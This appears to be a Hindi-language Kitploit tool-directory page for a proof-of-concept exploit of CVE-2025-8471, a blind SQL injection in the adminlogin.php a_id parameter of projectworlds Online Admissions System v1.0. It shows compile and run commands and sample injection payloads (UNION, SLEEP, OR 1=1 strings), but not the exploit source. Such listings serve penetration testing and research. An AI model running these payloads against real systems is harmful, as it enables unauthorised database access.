Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8471 — projectworlds Online Admissions System v1.0 में SQL injection का दोहन करें | Kitploit
उपकरण/GitHubGitHub/bytereaper77/cve-2025-8471
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगArchived
GitHubbytereaper77/cve-2025-8471

CVE-2025-8471

projectworlds Online Admissions System v1.0 में SQL injection का दोहन करें

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8471 SQL इंजेक्शन PoC

लेखक: Byte Reaper
CVE: CVE-2025-8471
कमजोरी: “projectworlds Online Admission System v1.0” में SQL इंजेक्शन
विवरण:
adminlogin.php?a_id= में एक ब्लाइंड SQL इंजेक्शन मौजूद है। यह PoC विभिन्न पेलोड—दोनों दो-चरणीय (INSERT … UNION SELECT …, SLEEP(), SELECT code …) और “डीप इंजेक्शन” स्ट्रिंग—के साथ GET अनुरोधों की एक श्रृंखला भेजता है, ताकि प्रतिक्रिया-लंबाई अंतर के माध्यम से समस्या का पता लगाया और उसकी गणना की जा सके।


आवश्यकताएँ

  • GCC (या कोई भी C कंपाइलर)
  • libcurl डेवलपमेंट हेडर्स
  • argparse.h && argparse.c
  • POSIX-संगत सिस्टम (Linux, macOS)

स्थापना

  1. सुनिश्चित करें कि आपके पास libcurl और argparse स्थापित हैं (जैसे Debian/Ubuntu पर: )।

sudo apt-get install libcurl4-openssl-dev
  • संकलन करें:

    root@kitploit:~
    gcc exploit.c argparse.c -o exploit -lcurl
    
    ./exploit -u <TARGET_BASE_URL> [-c cookies.txt] [-v]
    
    -u, --url — Base URL of the target, e.g. http://vulnsite.com
    
    -c, --cookies — (Optional) path to a cookies file to maintain session
    
    -v, --verbose — Enable verbose libcurl output and full response dumps
    
  • उदाहरण:

    ./exploit -u http:// -v

    यह निम्नलिखित करेगा:

    • /adminlogin.php पर एक सामान्य अनुरोध भेजेगा और उसकी लंबाई रिकॉर्ड करेगा।
    • दो-चरणीय और डीप पेलोड सूचियों पर लूप करेगा, प्रत्येक को ?a_id=… पर इंजेक्ट करेगा।
    • प्रत्येक इंजेक्शन की प्रतिक्रिया लंबाई की तुलना आधार रेखा से करेगा।
    • प्रत्येक पेलोड, HTTP स्थिति (यदि ≥2xx), और देखी गई लंबाई को result.log में लॉग करेगा।

    परीक्षण किए गए पेलोड :

    दो-चरणीय (Two-Stage)

    INSERT INTO stages (id,code) VALUES (3, 'UNION SELECT NULL --');

    SELECT SLEEP(2);

    SELECT code FROM stages WHERE id = 3;

    डीप इंजेक्शन (Deep Injection)

    '//OR//1=1--, '//OR//'a'='a'--, …

    इसमें बूलियन, टाइम-आधारित, यूनियन, सबस्ट्रिंग, ऑर्डर-बाय, लाइक, एक्ज़िस्ट्स, कमेंट-स्टाइल इंजेक्शन शामिल हैं।

    सभी पेलोड को वितरण से पहले curl_easy_escape के माध्यम से URL-एन्कोड किया जाता है।

    सन्दर्भ :

    • NVD : https://nvd.nist.gov/vuln/detail/CVE-2025-8471
    • CVE : https://www.cve.org/CVERecord?id=CVE-2025-8471

    लाइसेंस :

    MIT License

    टूल डाउनलोड करें